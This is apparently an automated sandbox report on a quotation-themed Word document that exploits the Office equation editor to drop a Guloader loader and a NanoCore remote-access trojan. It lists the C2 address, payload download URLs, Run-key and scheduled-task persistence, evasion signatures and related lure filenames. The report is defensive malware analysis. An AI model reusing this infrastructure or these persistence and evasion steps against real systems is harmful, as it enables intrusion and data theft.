odeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RAT
      Source: Yara match | File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara match | File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B28F6 bind,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B28C3 bind,

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Spearphishing Link (1) | Exploitation for Client Execution (13) | Scheduled Task/Job (1) | Access Token Manipulation (1) | Disable or Modify Tools (11) | Input Capture (11) | File and Directory Discovery (2) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Command and Scripting Interpreter (1) | Registry Run Keys / Startup Folder (1) | Process Injection (112) | Obfuscated Files or Information (1) | LSASS Memory | System Information Discovery (24) | Remote Desktop Protocol | Input Capture (11) | Exfiltration Over Bluetooth | Encrypted Channel (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Scheduled Task/Job (1) | Logon Script (Windows) | Scheduled Task/Job (1) | Software Packing (1) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder (1) | Masquerading (122) | NTDS | Security Software Discovery (621) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software (1) | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (23) | LSA Secrets | Virtualization/Sandbox Evasion (23) | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol (2) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol (113) | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (112) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      (Numbers in parentheses are the count of matching signatures shown in the original matrix.)

      Behavior Graph

      Behavior Graph ID: 358179 | Sample: QUOTATIONs44888_A2221_TOAN_... | Startdate: 25/02/2021 | Architecture: WINDOWS | Score: 100

      Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

      Process tree recovered from the graph:

      • EQNEDT32.EXE (started): contacts 67.199.248.10, 49165, 80 (GOOGLE-PRIVATE-CLOUDUS, United States), teknik.io 5.79.72.163, 443, 49166 (LEASEWEB-NL-AMS-01, Netherlands) and 2 other IPs or domains; drops C:\Users\user\AppData\Local\...\wREzo[1].txt (PE32) and C:\Users\Public\69577.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); starts 69577.exe
      • 69577.exe: signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Detected RDTSC dummy instruction sequence (likely for instruction hammering); 3 other signatures; starts two RegAsm.exe instances
      • RegAsm.exe (first instance, child of 69577.exe): contacts 194.5.98.202, 4488, 49171, 49172 (DANILENKODE, Netherlands), onedrive.live.com and 2 other IPs or domains; drops C:\Users\user\subfolder1\filename1.exe (PE32), C:\Users\user\AppData\Roaming\...\run.dat (data), C:\Users\user\AppData\Local\...\tmp9445.tmp (XML) and C:\Program Files (x86)\...\smtpsvc.exe (PE32); signatures: Tries to detect Any.run; Hides threads from debuggers; Hides that the sample has been downloaded from the Internet (zone.identifier); starts schtasks.exe (twice)
      • RegAsm.exe (second instance, child of 69577.exe): signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect virtualization through RDTSC time measurements
      • filename1.exe (started): signature: Multi AV Scanner detection for dropped file
      • taskeng.exe (started): starts RegAsm.exe and smtpsvc.exe
      • 2 other processes


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | 39% | Virustotal |
      QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | 25% | ReversingLabs | Document-RTF.Exploit.MathType

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 0% | Virustotal |
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 0% | Metadefender |
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt | 42% | Virustotal |
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt | 28% | ReversingLabs | Win32.Trojan.Guloader
      C:\Users\user\subfolder1\filename1.exe | 28% | ReversingLabs | Win32.Trojan.Guloader
      C:\Users\Public\69577.exe | 28% | ReversingLabs | Win32.Trojan.Guloader

      Unpacked PE Files

      Source | Detection | Scanner | Label
      6.2.RegAsm.exe.140000.3.unpack | 100% | Avira | TR/NanoCore.fadte

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      (empty) | 0% | Avira URL Cloud | safe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
      http://ocsp.entrust.net03 | 0% | URL Reputation | safe
      194.5.98.202 | 0% | Virustotal |
      194.5.98.202 | 0% | Avira URL Cloud | safe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
      http://ocsp.entrust.net0D | 0% | URL Reputation | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      bit.ly | 67.199.248.11 | true | false | | high
      teknik.io | 5.79.72.163 | true | false | | high
      onedrive.live.com | unknown | unknown | false | | high
      ibkebw.dm.files.1drv.com | unknown | unknown | false | | high
      u.teknik.io | unknown | unknown | false | | high

                Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      (empty) | true | Avira URL Cloud: safe | low
      194.5.98.202 | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
      http://bit.ly/2ZKf4aq | false | | high

                  URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp | false | | high
      http://crl.entrust.net/server1.crl0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | | high
      http://ocsp.entrust.net03 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      https://onedrive.live.com/E | RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp | false | | high
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      http://www.%s.comPA | RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp | false | URL Reputation: safe | low
      http://www.diginotar.nl/cps/pkioverheid0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      https://u.teknik.io/wREzo.txt | 2ZKf4aq[1].htm.2.dr | false | | high
      https://ibkebw.dm.files.1drv.com/y | RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp | false | | high
      http://ocsp.entrust.net0D | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      https://ibkebw.dm.files.1drv.com/ | RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp | false | | high
      https://secure.comodo.com/CPS0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | | high
      https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-P | RegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp | false | | high
      http://crl.entrust.net/2048ca.crl0 | RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | false | | high
      https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQ | RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp | false | | high
      https://onedrive.live.com/ | RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp | false | | high

                                        Contacted IPs


                                        Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      67.199.248.10 | unknown | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | true
      5.79.72.163 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | false
      194.5.98.202 | unknown | Netherlands | 208476 | DANILENKODE | true

                                        General Information

      Joe Sandbox Version: 31.0.0 Emerald
      Analysis ID: 358179
      Start date: 25.02.2021
      Start time: 07:28:29
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 8m 59s
      Hypervisor based Inspection enabled: false
      Report type: light
      Sample file name: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
      Cookbook file name: defaultwindowsofficecookbook.jbs
      Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed: 22
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.expl.evad.winDOC@19/25@6/3
      EGA Information: Failed
      HDC Information: Failed
      HCA Information:
      • Successful, ratio: 97%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210, 13.107.42.13, 13.107.42.12
      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, apps.identrust.com, au-bg-shim.trafficmanager.net
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        07:28:32 | API Interceptor | 46x Sleep call for process: EQNEDT32.EXE modified
                                        07:30:17 | API Interceptor | 77x Sleep call for process: 69577.exe modified
                                        07:30:25 | API Interceptor | 570x Sleep call for process: RegAsm.exe modified
                                        07:30:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe
                                        07:30:29 | Task Scheduler | Run new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
                                        07:30:29 | API Interceptor | 2x Sleep call for process: schtasks.exe modified
                                        07:30:29 | API Interceptor | 189x Sleep call for process: taskeng.exe modified
                                        07:30:31 | Task Scheduler | Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
                                        07:30:36 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                        07:30:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        Match | Associated Sample Name / URL | Detection | Context
                                        67.199.248.10 | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | bit.ly/3aLCPVF
                                        67.199.248.10 | PO AAN2102002-V020.doc | malicious | bit.ly/3pNzHgj
                                        67.199.248.10 | PO55004.doc | malicious | bit.ly/3kioaoe
                                        67.199.248.10 | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | bit.ly/2NUvTNf
                                        67.199.248.10 | RFQ Document.doc | malicious | bit.ly/3qOyCWN
                                        67.199.248.10 | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious | bit.ly/3qN5fEA
                                        67.199.248.10 | Order.doc | malicious | bit.ly/3boWBW4
                                        67.199.248.10 | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | bit.ly/2NScGvD
                                        67.199.248.10 | IMG_57109_Scanned.doc | malicious | bit.ly/3kemdsK
                                        67.199.248.10 | Deadly Variants of Covid 19.doc | malicious | bit.ly/2Me6ei3
                                        67.199.248.10 | swift payment.doc | malicious | bit.ly/2NmOCRI
                                        67.199.248.10 | IMG_6078_SCANNED.doc | malicious | bit.ly/3qIRVRz
                                        67.199.248.10 | IMG_01670_Scanned.doc | malicious | bit.ly/3duA4tQ
                                        67.199.248.10 | IMG_7742_Scanned.doc | malicious | bit.ly/3sdTreK
                                        67.199.248.10 | QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc | malicious | bit.ly/3dCBRgm
                                        67.199.248.10 | DHL Shipment Notification 7465649870.doc | malicious | bit.ly/3bhrITG
                                        67.199.248.10 | Quote QU038097.doc | malicious | bit.ly/3aom5Uu
                                        67.199.248.10 | IMG_51067.doc__.rtf | malicious | bit.ly/3djdyUC
                                        67.199.248.10 | IMG_123773.doc | malicious | bit.ly/2Nsv9ym
                                        67.199.248.10 | B62672021 PRETORIA.doc | malicious | bit.ly/3jOWhDW

                                        Domains

                                        Match | Associated Sample Name / URL | Detection | Context
                                        bit.ly | CsmBq6KLHu.doc | malicious | 67.199.248.11
                                        bit.ly | purchase order_2242021.doc | malicious | 67.199.248.11
                                        bit.ly | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc | malicious | 67.199.248.11
                                        bit.ly | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        bit.ly | PO AAN2102002-V020.doc | malicious | 67.199.248.11
                                        bit.ly | PO55004.doc | malicious | 67.199.248.10
                                        bit.ly | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        bit.ly | RFQ Document.doc | malicious | 67.199.248.10
                                        bit.ly | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious | 67.199.248.10
                                        bit.ly | Order.doc | malicious | 67.199.248.10
                                        bit.ly | QUOTE.doc | malicious | 67.199.248.11
                                        bit.ly | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        bit.ly | IMG_57109_Scanned.doc | malicious | 67.199.248.10
                                        bit.ly | Deadly Variants of Covid 19.doc | malicious | 67.199.248.10
                                        bit.ly | swift payment.doc | malicious | 67.199.248.10
                                        bit.ly | IMG_61061_SCANNED.doc | malicious | 67.199.248.11
                                        bit.ly | IMG_6078_SCANNED.doc | malicious | 67.199.248.11
                                        bit.ly | IMG_01670_Scanned.doc | malicious | 67.199.248.10
                                        bit.ly | IMG_7742_Scanned.doc | malicious | 67.199.248.10
                                        bit.ly | SWIFT Payment W0301.doc | malicious | 67.199.248.11

                                        ASN

                                        Match | Associated Sample Name / URL | Detection | Context
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | purchase order_2242021.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | PO AAN2102002-V020.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | PO55004.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | RFQ Document.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | SecuriteInfo.com.Trojan.PackedNET.540.1271.exe | malicious | 213.227.154.188
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | MV9tCJw8Xr.exe | malicious | 5.79.70.250
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | Quotation408S_A02021_AHYAN_group_of_companies.doc | malicious | 5.79.72.163
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | Request For Quotation.PDF.exe | malicious | 212.32.237.101
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | PO#652.exe | malicious | 5.79.87.207
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | Parcel _009887 .exe | malicious | 212.32.237.92
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | PO 20211602.xlsm | malicious | 82.192.82.225
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | 6d0000.exe | malicious | 213.227.133.129
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | SecuriteInfo.com.Trojan.PackedNET.541.9005.exe | malicious | 62.212.86.139
                                        LEASEWEB-NL-AMS-01 (Netherlands, NL) | New Order 83329 PDF.exe | malicious | 95.211.208.58
                                        GOOGLE-PRIVATE-CLOUD (US) | CsmBq6KLHu.doc | malicious | 67.199.248.11
                                        GOOGLE-PRIVATE-CLOUD (US) | Details van vereiste.pps | malicious | 67.199.248.16
                                        GOOGLE-PRIVATE-CLOUD (US) | purchase order_2242021.doc | malicious | 67.199.248.11
                                        GOOGLE-PRIVATE-CLOUD (US) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc | malicious | 67.199.248.11
                                        GOOGLE-PRIVATE-CLOUD (US) | Offerte aanvragen 22-02-2021.ppt | malicious | 67.199.248.16
                                        GOOGLE-PRIVATE-CLOUD (US) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | PO AAN2102002-V020.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | PO55004.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | RFQ Document.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | Order.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | QUOTE.doc | malicious | 67.199.248.11
                                        GOOGLE-PRIVATE-CLOUD (US) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | IMG_57109_Scanned.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | Deadly Variants of Covid 19.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | swift payment.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | IMG_61061_SCANNED.doc | malicious | 67.199.248.11
                                        GOOGLE-PRIVATE-CLOUD (US) | IMG_6078_SCANNED.doc | malicious | 67.199.248.10
                                        GOOGLE-PRIVATE-CLOUD (US) | IMG_01670_Scanned.doc | malicious | 67.199.248.10
                                        DANILENKO (DE) | swift006.pdf.exe | malicious | 194.5.97.116
                                        DANILENKO (DE) | neue bestellung.PDF.exe | malicious | 194.5.97.48
                                        DANILENKO (DE) | m72OvSF7e5.exe | malicious | 194.5.98.202
                                        DANILENKO (DE) | neue bestellung.PDF.exe | malicious | 194.5.97.48
                                        DANILENKO (DE) | Eingang.Jpg.exe | malicious | 194.5.97.116
                                        DANILENKO (DE) | V33QokMrIv.exe | malicious | 194.5.98.202
                                        DANILENKO (DE) | 3Fv4j323nj.exe | malicious | 194.5.98.182
                                        DANILENKO (DE) | scan09e8902093922023ce.exe | malicious | 194.5.98.46
                                        DANILENKO (DE) | PO AAN2102002-V020.doc | malicious | 194.5.98.182
                                        DANILENKO (DE) | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious | 194.5.98.202
                                        DANILENKO (DE) | neue bestellung.PDF.exe | malicious | 194.5.97.48
                                        DANILENKO (DE) | Orderoffer.exe | malicious | 194.5.98.66
                                        DANILENKO (DE) | neue bestellung.PDF.exe | malicious | 194.5.97.48
                                        DANILENKO (DE) | OrderSuppliesQuote0817916.exe | malicious | 194.5.97.248
                                        DANILENKO (DE) | DHL_6368638172 documento de recibo,pdf.exe | malicious | 194.5.97.244
                                        DANILENKO (DE) | QuotationInvoices.exe | malicious | 194.5.97.248
                                        DANILENKO (DE) | PAYMENT_.EXE | malicious | 194.5.98.211
                                        DANILENKO (DE) | payment.exe | malicious | 194.5.98.66
                                        DANILENKO (DE) | RFQ_1101983736366355 1101938377388.exe | malicious | 194.5.98.21
                                        DANILENKO (DE) | Slip copy .xls.exe | malicious | 194.5.97.116

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        Match | Associated Sample Name / URL | Detection
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | PO AAN2102002-V020.doc | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | RFQ # TSI2202708.doc | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | rfq_20712557-20200308 Order.doc | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 31RFQ 49177 PO-DM-11-2018-109159.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 69shipment Details...exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 41COSCO TBN FULLY SIGNED CPFN.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 19Request for Quote_Goedeker_6397_3 01-2_12137018.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 72Payment....exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 832238740303837363.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 35Request for Quote_SOSi_6397_3 01-2_12137018.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 61Request for Quote_SOSi_6397_3 01-2_12137018.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 17Request for Quote_SOSi_6397_3 01-2_12137018.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 71RFQ Ganix Global-180001899918 & 500037221.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 81PAYMENT.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe | malicious
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 2810010518.exe | malicious

                                                                                Created / dropped Files

                                                                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
